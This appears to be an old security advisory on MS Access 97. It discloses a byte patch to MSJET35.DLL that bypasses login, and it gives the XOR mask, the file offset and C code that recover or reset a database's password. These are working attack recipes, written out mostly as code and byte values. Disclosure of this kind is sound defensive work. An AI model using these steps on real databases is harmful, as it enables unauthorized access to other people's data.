COMMAND
MS Access 97
SYSTEMS AFFECTED
Win running MS Access 97
PROBLEM
Alexey Doumov posted following. There is potential problem with
MS Access 97 MSJET35.DLL which may lead to unauthorized access by
simple modify of code. Original code of MSJET35.DLL is:
B0747: B9 10 00 00 00 mov cx, 10=20
B074C: F3 A6 repe cmpsb=20
B074E: 75 02 jne B0752=20
New code of MSJET35.DLL is:
B0747: B9 10 00 00 00 mov cx, 10
B074C: F3 A6 repe cmpsb=20
B074E: 90 nop=20
B074F: 90 nop=20
Make this change and run
msaccess.exe /user admin
and have fun.
Here is yet another vulnerability. MS Access allows us to set a
password for a database. Yes, it is. But we can find that this
password is stored in 13 bytes at offset 0x42 in an .MDB file.
And to get it decrypted we need just to read these 13 bytes and
use bitwise exclusive OR operator, with bytes 0x86, 0xFB, 0xEC,
0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13
respectively. This sequence represents all-zeros-password and
could be found in a non-encrypted .MDB file at offset 0x42.
This is a fragment of code to get database password:
static unsigned char mask[13] = {0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13};
unsigned char password[14];
// get 13 bytes from an .MDB file (offset 0x42) into password
. . . .
for(int i = 0; i < 13; i ++) password[i] ^= mask[i];
password[i] = 0;
printf("password=%s", password);
Note 1. If someone wants to reset password, he can just set value
of byte at offset 0x42 into 0x86.
Note 2. Last character is ignored in a 14-character password.
SOLUTION
No info. I'm not sure does SR-1 makes any differences, but
password protection of MS Office components was never so strong.
If you really want to protect your database, you should look for
some professional piece of software.